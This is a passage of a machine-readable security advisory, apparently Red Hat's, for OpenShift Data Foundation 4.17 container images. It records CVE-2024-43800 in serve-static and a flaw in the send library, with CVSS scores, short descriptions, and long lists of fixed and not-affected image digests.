"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "send: Code Execution Vulnerability in Send Library"
},
{
"cve": "CVE-2024-43800",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:33.631718+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311154"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "serve-static: Improper Sanitization in serve-static",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x"
],
"known_not_affected": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
